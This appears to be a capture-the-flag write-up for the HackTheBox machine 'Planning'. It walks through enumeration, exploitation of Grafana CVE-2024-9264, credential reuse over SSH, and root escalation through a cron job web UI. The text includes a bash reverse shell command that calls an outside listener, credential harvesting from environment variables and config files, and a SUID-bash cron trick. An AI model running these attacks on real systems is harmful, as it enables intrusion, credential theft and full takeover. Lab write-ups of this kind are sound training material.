HackTheBox Planning

Writeup for HackTheBox Planning

Machine Synopsis

Key Exploitation Techniques

- Subdomain enumeration → Grafana instance discovery

- Credential reuse and Grafana admin access

- Exploitation of Grafana v11.0.0 (CVE-2024-9264)

- Container enumeration → credential discovery in environment variables

- Lateral movement via SSH to host system

- Privilege escalation via a cron job scheduler web UI

Enumeration

Shiro ❯ python3 nmap_owo.py 10.10.11.68

[i] Resolved 10.10.11.68 to 10.10.11.68

=============== Phase 1: TCP Port Scanning ===============

[+] Exec: nmap -p- --min-rate 5000 -T4 -oX nmap_scan/01_tcp_full.xml 10.10.11.68

[+] Discovered open TCP ports: [22, 80]

[+] Exec: nmap -sC -sV -p 22,80 -T4 -oX nmap_scan/02_tcp_detail.xml 10.10.11.68

=============== Phase 2: Hostname Discovery ===============

[+] Hostname(s) discovered: planning.htb

[+] To add this entry, run:

echo -e '10.10.11.68\tplanning.htb' | sudo tee -a /etc/hosts

[i] Rerun with sudo for automatic update.

=============== Phase 4: Service Summary ===============

- 22/tcp ssh (OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 Ubuntu Linux; protocol 2.0)

| ssh-hostkey: 256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)

|_ ssh-hostkey: 256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)

- 80/tcp http (nginx 1.24.0 Ubuntu)

|_ http-server-header: nginx/1.24.0 (Ubuntu)

|_ http-title: Did not follow redirect to http://planning.htb/
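nmap_owo.py is the author's own wrapper and its source is not shown here. As a rough sketch of how such a wrapper could turn the full-port scan's `-oX` XML into the port list for the detailed scan, Python's standard XML parser is enough. The helper name `open_tcp_ports` and the trimmed sample XML are illustrative assumptions, not the wrapper's actual code or scan file.

```python
import xml.etree.ElementTree as ET

# Trimmed, hand-written sample in nmap's -oX layout (not the real scan file).
SAMPLE_XML = """<nmaprun><host><ports>
<port protocol="tcp" portid="80"><state state="open"/></port>
<port protocol="tcp" portid="22"><state state="open"/></port>
<port protocol="tcp" portid="443"><state state="closed"/></port>
</ports></host></nmaprun>"""


def open_tcp_ports(xml_text: str) -> list[int]:
    """Return the sorted open TCP ports found in nmap XML output (hypothetical helper)."""
    root = ET.fromstring(xml_text)
    ports = []
    # Each <port> element carries protocol/portid attributes and a <state> child.
    for port in root.iter("port"):
        state = port.find("state")
        if port.get("protocol") == "tcp" and state is not None and state.get("state") == "open":
            ports.append(int(port.get("portid")))
    return sorted(ports)


if __name__ == "__main__":
    ports = open_tcp_ports(SAMPLE_XML)
    print(ports)  # [22, 80]
    # Second phase: service/script scan restricted to the discovered ports.
    print(f"nmap -sC -sV -p {','.join(map(str, ports))} -T4 10.10.11.68")
```

Feeding the result into `-p` keeps the slower `-sC -sV` scan limited to the open ports, which matches the two-phase approach in the output above.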

Shiro ❯ echo -e '10.10.11.68\tplanning.htb' | sudo tee -a /etc/hosts

The hostname was added to the /etc/hosts file.
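Because `tee -a` appends unconditionally, rerunning the command adds a duplicate line each time. A minimal idempotent variant is sketched below in Python; `with_hosts_entry` is a hypothetical helper that only computes the new file contents, so writing the result back to /etc/hosts (which needs root) is left to the caller.

```python
def with_hosts_entry(hosts_text: str, ip: str, hostname: str) -> str:
    """Return hosts_text with 'ip<TAB>hostname' appended unless that mapping already exists."""
    for line in hosts_text.splitlines():
        fields = line.split("#", 1)[0].split()  # ignore comments, split on any whitespace
        if fields and fields[0] == ip and hostname in fields[1:]:
            return hosts_text  # already mapped: leave the contents unchanged
    if hosts_text and not hosts_text.endswith("\n"):
        hosts_text += "\n"  # make sure the new entry starts on its own line
    return hosts_text + f"{ip}\t{hostname}\n"


if __name__ == "__main__":
    original = "127.0.0.1\tlocalhost\n"
    once = with_hosts_entry(original, "10.10.11.68", "planning.htb")
    twice = with_hosts_entry(once, "10.10.11.68", "planning.htb")
    print(once == twice)  # True: a second run adds nothing
    # Writing the result back to /etc/hosts requires root privileges.
```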

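Navigating to http://planning.htb revealed a static page. Subdomain enumeration was then performed with ffuf, fuzzing the Host header to discover additional virtual hosts; responses of 178 bytes, the size returned for non-existent virtual hosts, were filtered out with -fs 178.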

Shiro ❯ ffuf -c -u "http://planning.htb" -H "Host: FUZZ.planning.htb" -w ~/wordlists/seclists/Discovery/DNS/bug-bounty-program-subdomains-trickest-inventory.txt -fs 178

...

grafana [Status: 302, Size: 29, Words: 2, Lines: 3, Duration: 6ms]
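ffuf finds virtual hosts by sending the same request to the server with a different Host header each time and hiding responses of a given size, here the 178-byte response returned for names the server does not recognize. The sketch below reproduces that logic in Python under these assumptions: `find_vhosts` and `fetch_with_host` are hypothetical helpers, redirects are deliberately not followed (http.client never follows them), and the demo uses an offline stub whose 301 status for unknown names is assumed; only the sizes come from the ffuf run.

```python
import http.client
from typing import Callable, Iterable


def fetch_with_host(target: str, vhost: str, timeout: float = 5.0) -> tuple[int, int]:
    """GET / from target:80 with a custom Host header; return (status, body size)."""
    conn = http.client.HTTPConnection(target, 80, timeout=timeout)
    try:
        # An explicit Host header replaces the one http.client would add; redirects are not followed.
        conn.request("GET", "/", headers={"Host": vhost})
        resp = conn.getresponse()
        return resp.status, len(resp.read())
    finally:
        conn.close()


def find_vhosts(words: Iterable[str], domain: str, filter_size: int,
                fetch: Callable[[str], tuple[int, int]]) -> list[tuple[str, int, int]]:
    """Mimic ffuf -H 'Host: FUZZ.domain' -fs N: keep responses whose size is not N."""
    hits = []
    for word in words:
        vhost = f"{word}.{domain}"
        status, size = fetch(vhost)
        if size != filter_size:
            hits.append((vhost, status, size))
    return hits


if __name__ == "__main__":
    # Offline stub: grafana answers 302 with 29 bytes as in the ffuf run; every other
    # name gets the 178-byte catch-all response (its 301 status is assumed).
    def stub(vhost: str) -> tuple[int, int]:
        return (302, 29) if vhost == "grafana.planning.htb" else (301, 178)

    print(find_vhosts(["www", "dev", "grafana"], "planning.htb", 178, stub))
    # Live equivalent (lab VPN required):
    # find_vhosts(words, "planning.htb", 178, lambda v: fetch_with_host("10.10.11.68", v))
```

With the stub, only `('grafana.planning.htb', 302, 29)` survives the size filter, mirroring the single ffuf hit.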

The grafana.planning.htb subdomain presented a Grafana login portal, displaying version 11.0.0.

Exploitation

Logging in with the credentials supplied for the machine, admin:0D5oT70Fq13EvB5r, was successful.

Shiro ❯ dirsearch -u 'http://grafana.planning.htb'

...

[16:06:59] 200 - 26B - /robots.txt

[16:07:00] 200 - 37KB - /signup



[16:07:01] 200 - 3KB - /swagger

...

The /swagger endpoint exposes Grafana's interactive API documentation.



The Swagger documentation lists an admin settings endpoint, /api/admin/settings, which can be queried with the admin credentials to dump the server configuration.

Shiro ❯ curl -u admin:0D5oT70Fq13EvB5r http://grafana.planning.htb/api/admin/settings | jq

{

"DEFAULT": {

"app_mode": "false",

"instance_name": "7ce659d667d7",

"target": "all"

},

"auth.basic": {

"enabled": "true",

"password_policy": "*********"

},...,

"database": {

"name": "grafana",

"password": "",

"path": "grafana.db",

"query_retries": "0",

"server_cert_name": "",

"skip_migrations": "",

"ssl_mode": "disable",

"ssl_sni": "",

"transaction_retries": "5",

"type": "sqlite3",

"url": "",

"user": "root",

"wal": "false"

},...,

"security": {

"admin_email": "admin@localhost",

"admin_password": "*********",

"admin_user": "enzo",

},...

}
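The same dump can be scripted. In this sketch, `get_admin_settings` sends the HTTP Basic credentials that `curl -u` would, and `unredacted` keeps only the non-empty values that Grafana did not mask with asterisks. Both helper names are hypothetical, and the demo runs on an excerpt of the output above rather than a live request.

```python
import base64
import json
import urllib.request

# Excerpt of the /api/admin/settings output shown above.
SAMPLE_SETTINGS = {
    "database": {"password": "", "type": "sqlite3", "user": "root"},
    "security": {"admin_email": "admin@localhost", "admin_password": "*********", "admin_user": "enzo"},
}


def basic_auth_header(user: str, password: str) -> str:
    """Build the Authorization value that curl -u user:password sends."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def get_admin_settings(base_url: str, user: str, password: str) -> dict:
    """Fetch Grafana's /api/admin/settings (expected to need a server admin account)."""
    req = urllib.request.Request(
        f"{base_url.rstrip('/')}/api/admin/settings",
        headers={"Authorization": basic_auth_header(user, password)},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


def unredacted(settings: dict, sections=("security", "database")) -> dict:
    """Return 'section.key' -> value for non-empty string values not masked with '*'."""
    found = {}
    for section in sections:
        for key, value in settings.get(section, {}).items():
            if isinstance(value, str) and value and set(value) != {"*"}:
                found[f"{section}.{key}"] = value
    return found


if __name__ == "__main__":
    for name, value in unredacted(SAMPLE_SETTINGS).items():
        print(f"{name} = {value}")
```

Against the lab, `unredacted(get_admin_settings("http://grafana.planning.htb", "admin", "0D5oT70Fq13EvB5r"))` would be the scripted counterpart of the curl and jq pipeline; on the excerpt it surfaces `security.admin_user = enzo`, a username worth keeping.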

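A quick search for vulnerabilities in Grafana v11.0.0 identified CVE-2024-9264, a command injection and local file inclusion vulnerability in Grafana's experimental SQL Expressions feature, which passes user-controlled queries to DuckDB without sufficient sanitization. A public proof of concept was used to run a reverse shell payload.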

Shiro ❯ git clone https://github.com/nollium/CVE-2024-9264

Shiro ❯ cd CVE-2024-9264

Shiro ❯ virtualenv myenv

Shiro ❯ source myenv/bin/activate

Shiro ❯ pip install -r requirements.txt

Shiro ❯ python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c 'bash -c "bash -i >& /dev/tcp/10.10.16.8/1234 0>&1"' http://grafana.planning.htb/

[+] Logged in as admin:0D5oT70Fq13EvB5r

[+] Executing command: bash -c "bash -i >& /dev/tcp/10.10.16.8/1234 0>&1"

⠏ Running duckdb query

With a netcat listener running on port 1234, the reverse shell connected back, providing root access inside a Docker container.

Shiro ❯ nc -nlvp 1234

listening on [any] 1234 ...

connect to [10.10.16.8] from (UNKNOWN) [10.10.11.68] 37456

bash: cannot set terminal process group (1): Inappropriate ioctl for device

bash: no job control in this shell

root@7ce659d667d7:~#
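The prompt already hints at containerization: `7ce659d667d7` has the shape of a short Docker container ID, which Docker uses as the default hostname. A quick, non-conclusive check can be sketched in Python; `container_hints` is a hypothetical helper that combines that hostname pattern with the presence of /.dockerenv, a marker file Docker normally creates in the container root.

```python
import os
import re
import socket


def container_hints(hostname: str, root: str = "/") -> list[str]:
    """Collect simple, non-conclusive signs of running inside a Docker container."""
    hints = []
    # By default Docker sets the hostname to the first 12 hex digits of the container ID.
    if re.fullmatch(r"[0-9a-f]{12}", hostname):
        hints.append(f"hostname {hostname!r} looks like a short container ID")
    # Docker normally creates an empty /.dockerenv file in the container's root.
    if os.path.exists(os.path.join(root, ".dockerenv")):
        hints.append("/.dockerenv exists")
    return hints


if __name__ == "__main__":
    print(container_hints(socket.gethostname()))
```

The `hostname -I` result on this box, 172.17.0.2, also falls inside Docker's default bridge network (172.17.0.0/16), which points the same way.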

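The next step was to enumerate the container environment to find a path to the host system. The env output exposed the Grafana admin credentials, which were passed to the container through the GF_SECURITY_ADMIN_USER and GF_SECURITY_ADMIN_PASSWORD environment variables.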

root@7ce659d667d7:~# whoami

root

root@7ce659d667d7:~# hostname

7ce659d667d7

root@7ce659d667d7:~# hostname -I

172.17.0.2

root@7ce659d667d7:~# env

AWS_AUTH_SESSION_DURATION=15m

HOSTNAME=7ce659d667d7

PWD=/usr/share/grafana

AWS_AUTH_AssumeRoleEnabled=true

GF_PATHS_HOME=/usr/share/grafana

AWS_CW_LIST_METRICS_PAGE_LIMIT=500

HOME=/usr/share/grafana

AWS_AUTH_EXTERNAL_ID=

SHLVL=2

GF_PATHS_PROVISIONING=/etc/grafana/provisioning

GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!

GF_SECURITY_ADMIN_USER=enzo

GF_PATHS_DATA=/var/lib/grafana

GF_PATHS_LOGS=/var/log/grafana

PATH=/usr/local/bin:/usr/share/grafana/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

AWS_AUTH_AllowedAuthProviders=default,keys,credentials

GF_PATHS_PLUGINS=/var/lib/grafana/plugins

GF_PATHS_CONFIG=/etc/grafana/grafana.ini

_=/usr/bin/env
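Grafana lets environment variables named `GF_<SECTION>_<KEY>` override settings in grafana.ini, so `GF_SECURITY_ADMIN_USER` and `GF_SECURITY_ADMIN_PASSWORD` correspond to the `security` section's `admin_user` and `admin_password` seen in the settings dump, where the password was masked. The Python sketch below, using a hypothetical `grafana_env_creds` helper, pulls those two values out of `env` output.

```python
import os

# Excerpt of the env output above.
SAMPLE_ENV = """HOSTNAME=7ce659d667d7
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
GF_SECURITY_ADMIN_USER=enzo
GF_PATHS_CONFIG=/etc/grafana/grafana.ini"""


def grafana_env_creds(env_output: str) -> dict[str, str]:
    """Extract Grafana's admin user/password overrides from env-style KEY=VALUE lines."""
    wanted = {"GF_SECURITY_ADMIN_USER": "user", "GF_SECURITY_ADMIN_PASSWORD": "password"}
    creds = {}
    for line in env_output.splitlines():
        name, sep, value = line.partition("=")  # split on the first '=' only
        if sep and name in wanted:
            creds[wanted[name]] = value
    return creds


if __name__ == "__main__":
    print(grafana_env_creds(SAMPLE_ENV))  # {'password': 'RioTecRANDEntANT!', 'user': 'enzo'}
    # Same check against this process's own environment; {} unless the GF_SECURITY_* variables are set.
    live = "\n".join(f"{k}={v}" for k, v in os.environ.items())
    print(grafana_env_creds(live))
```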

These credentials (enzo:RioTecRANDEntANT!) were successfully reused to SSH into the host machine, planning.htb.

Lateral Movement

Upon successful login, the user flag was retrieved.

Shiro ❯ ssh enzo@planning.htb

enzo@planning:~$ cat user.txt

6b417eb7ee6170ded4175c25bcc5fce9

Privilege Escalation

Once on the host, internal enumeration was performed to identify escalation vectors.

netstat -tulnp revealed several services listening only on localhost, including MySQL on port 3306 and an unidentified service on port 8000.

enzo@planning:~$ netstat -tulnp

...

tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -

tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -

...
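Services bound to 127.0.0.1 are invisible to the external nmap scan, which is why 3306 and 8000 did not appear earlier. A Python sketch of filtering `netstat -tulnp` output for loopback-only TCP listeners follows; `loopback_listeners` is a hypothetical helper and assumes the usual net-tools column order (Proto, Recv-Q, Send-Q, Local Address, Foreign Address, State, PID/Program).

```python
import ipaddress

# Excerpt of the netstat -tulnp output above.
SAMPLE_NETSTAT = """tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -"""


def loopback_listeners(netstat_output: str) -> list[tuple[str, int]]:
    """Return (address, port) for listening TCP sockets bound to a loopback address."""
    found = []
    for line in netstat_output.splitlines():
        fields = line.split()
        # Expected columns: Proto Recv-Q Send-Q Local-Address Foreign-Address State PID/Program
        if len(fields) < 6 or not fields[0].startswith("tcp") or fields[5] != "LISTEN":
            continue
        addr, _, port = fields[3].rpartition(":")  # rpartition also copes with IPv6, e.g. ::1:631
        try:
            if ipaddress.ip_address(addr).is_loopback:
                found.append((addr, int(port)))
        except ValueError:
            continue  # not a plain IP address; skip the row
    return found


if __name__ == "__main__":
    print(loopback_listeners(SAMPLE_NETSTAT))  # [('127.0.0.1', 3306), ('127.0.0.1', 8000)]
```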

The web root at /var/www/web was then searched for credentials or other useful information.

enzo@planning:~$ ls /var/www/web/

about.php contact.php course.php css detail.php enroll.php img index.php js lib scss

enzo@planning:~$ cat /var/www/web/index.php

<?php

$servername = "localhost";

$username = "root";

$password = "EXTRapHY";

$dbname = "edukate";

$conn = new mysqli($servername, $username, $password, $dbname);

if ($conn->connect_error) {

die("Connection failed: " . $conn->connect_error);

}

$message = '';

if (isset($_POST['keyword'])) {

$keyword = $_POST['keyword'];

$sql = "SELECT * FROM courses WHERE course_name LIKE ?";

$stmt = $conn->prepare($sql);

$keyword = "%" . $keyword . "%";

$stmt->bind_param("s", $keyword);

$stmt->execute();

$result = $stmt->get_result();

if ($result->num_rows > 0) {

$message = '<h3>Search results:</h3>';

while ($row = $result->fetch_assoc()) {

$message .= "<p>" . $row['course_name'] . " - " . $row['description'] . "</p>";

}

} else {

$message = '<h3>Search results:</h3>';

}

$stmt->close();

}

$conn->close();

?>

...
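For a web root this small, reading the files by hand is enough, but the same search can be sketched in Python. The regular expression is a heuristic assumption: it only catches quoted PHP string assignments to variables whose names contain pass, pwd, user, or db, and `php_secrets` is a hypothetical helper.

```python
import re
from pathlib import Path

# Heuristic: quoted string assigned to a PHP variable whose name contains pass/pwd/user/db.
ASSIGN = re.compile(r"""\$(\w*(?:pass|pwd|user|db)\w*)\s*=\s*(['"])(.*?)\2""", re.IGNORECASE)


def php_secrets(source: str) -> list[tuple[str, str]]:
    """Return (variable, value) pairs for credential-looking assignments in PHP source."""
    return [(m.group(1), m.group(3)) for m in ASSIGN.finditer(source)]


if __name__ == "__main__":
    web_root = Path("/var/www/web")
    if web_root.is_dir():
        for php in sorted(web_root.rglob("*.php")):
            for name, value in php_secrets(php.read_text(errors="replace")):
                print(f"{php}: ${name} = {value!r}")
```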

The index.php source contained MySQL credentials (root:EXTRapHY), but they were a dead end: the database access did not provide a way to execute a shell.

SSH local port forwarding was used to reach port 8000 from the attacking machine.

Shiro ❯ ssh -L 8000:127.0.0.1:8000 enzo@10.10.11.68 -N

enzo@10.10.11.68's password:



Navigating to http://localhost:8000 in a browser showed an authentication prompt.



A further search for configuration files or credentials related to this service led to /opt/crontabs/crontab.db. This file contains the cron job definitions, including one with a hardcoded password for a zip archive.

enzo@planning:/opt/crontabs$ ls

crontab.db

enzo@planning:/opt/crontabs$ cat crontab.db

{"name":"Grafana backup","command":"/usr/bin/docker save root_grafana -o /var/backups/grafana.tar && /usr/bin/gzip /var/backups/grafana.tar && zip -P P4ssw0rdS0pRi0T3c /var/backups/grafana.tar.gz.zip /var/backups/grafana.tar.gz && rm /var/backups/grafana.tar.gz","schedule":"@daily","stopped":false,"timestamp":"Fri Feb 28 2025 20:36:23 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740774983276,"saved":false,"_id":"GTI22PpoJNtRKg0W"}

{"name":"Cleanup","command":"/root/scripts/cleanup.sh","schedule":"* * * * *","stopped":false,"timestamp":"Sat Mar 01 2025 17:15:09 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740849309992,"saved":false,"_id":"gNIRXh1WIc9K7BYX"}
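crontab.db stores one JSON object per line, so the job list can be parsed directly instead of read by eye. In this Python sketch, `parse_jobs` and `zip_passwords` are hypothetical helpers, and the regular expression only handles the `zip -P <password>` form used here; it would miss `-P` placed after other options.

```python
import json
import re
from pathlib import Path

# Two job records shaped like the crontab.db lines above (the backup command is shortened).
SAMPLE_DB = """{"name":"Grafana backup","command":"/usr/bin/gzip /var/backups/grafana.tar && zip -P P4ssw0rdS0pRi0T3c /var/backups/grafana.tar.gz.zip /var/backups/grafana.tar.gz","schedule":"@daily"}
{"name":"Cleanup","command":"/root/scripts/cleanup.sh","schedule":"* * * * *"}
"""

# Only the 'zip -P <password>' form; the \b keeps it from matching inside 'gzip'.
ZIP_PASSWORD = re.compile(r"\bzip\s+-P\s+(\S+)")


def parse_jobs(db_text: str) -> list[dict]:
    """Parse one JSON job object per non-empty line."""
    return [json.loads(line) for line in db_text.splitlines() if line.strip()]


def zip_passwords(jobs: list[dict]) -> list[tuple[str, str]]:
    """Return (job name, password) for each 'zip -P' found in a job's command."""
    found = []
    for job in jobs:
        for match in ZIP_PASSWORD.finditer(job.get("command", "")):
            found.append((job.get("name", "?"), match.group(1)))
    return found


if __name__ == "__main__":
    db = Path("/opt/crontabs/crontab.db")
    jobs = parse_jobs(db.read_text() if db.exists() else SAMPLE_DB)
    for job in jobs:
        print(f"{job.get('schedule', '?'):>10}  {job.get('name', '?')}")
    print(zip_passwords(jobs))
```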

The zip password, P4ssw0rdS0pRi0T3c, was extracted from the backup job. Reusing it granted access to the cron job web UI on port 8000.



The web UI allowed the creation of new cron jobs with arbitrary commands that would run as root. A new job was created to copy the /bin/bash binary to /tmp and set the SUID bit, allowing it to be run with root privileges.

After the job was saved and executed, the SUID binary was available in /tmp.

enzo@planning:/opt/crontabs$ ls /tmp

shiro systemd-private-873dcc6c3fc444e98ece2e692ebc748b-systemd-resolved.service-3pWPJ8 vbwze3KEQ8980nGS.stdout

systemd-private-873dcc6c3fc444e98ece2e692ebc748b-ModemManager.service-XqmMES systemd-private-873dcc6c3fc444e98ece2e692ebc748b-systemd-timesyncd.service-dSyv4m vmware-root_732-2999591876

systemd-private-873dcc6c3fc444e98ece2e692ebc748b-polkit.service-N7UWGC systemd-private-873dcc6c3fc444e98ece2e692ebc748b-upower.service-M4Q3Dq YvZsUUfEXayH6lLj.stderr

systemd-private-873dcc6c3fc444e98ece2e692ebc748b-systemd-logind.service-cqyQI5 vbwze3KEQ8980nGS.stderr YvZsUUfEXayH6lLj.stdout
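The directory listing shows that /tmp/shiro exists but not its mode or owner; for a SUID binary, `ls -l /tmp/shiro` would show an `s` in the owner's execute position. The Python sketch below, with a hypothetical `is_root_suid` helper, checks the same thing from `os.stat`: a regular file, owned by uid 0, with the set-user-ID bit set.

```python
import os
import stat


def is_root_suid(mode: int, uid: int) -> bool:
    """True for a regular file owned by uid 0 with the set-user-ID bit set."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0


def check(path: str) -> bool:
    """Stat path and apply is_root_suid to its mode and owner."""
    st = os.stat(path)
    return is_root_suid(st.st_mode, st.st_uid)


if __name__ == "__main__":
    path = "/tmp/shiro"  # the file name used in this writeup
    if os.path.exists(path):
        print(path, "root-owned SUID:", check(path))
    print(is_root_suid(0o104755, 0))  # True: -rwsr-xr-x owned by root
```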

Executing the newly created SUID binary with the -p flag (to preserve effective user ID) provided a root shell.

enzo@planning:/opt/crontabs$ /tmp/shiro -p

shiro-5.2# whoami

root

shiro-5.2# cat /root/root.txt

01585c767ec2e4ddc18a8f8758d999cf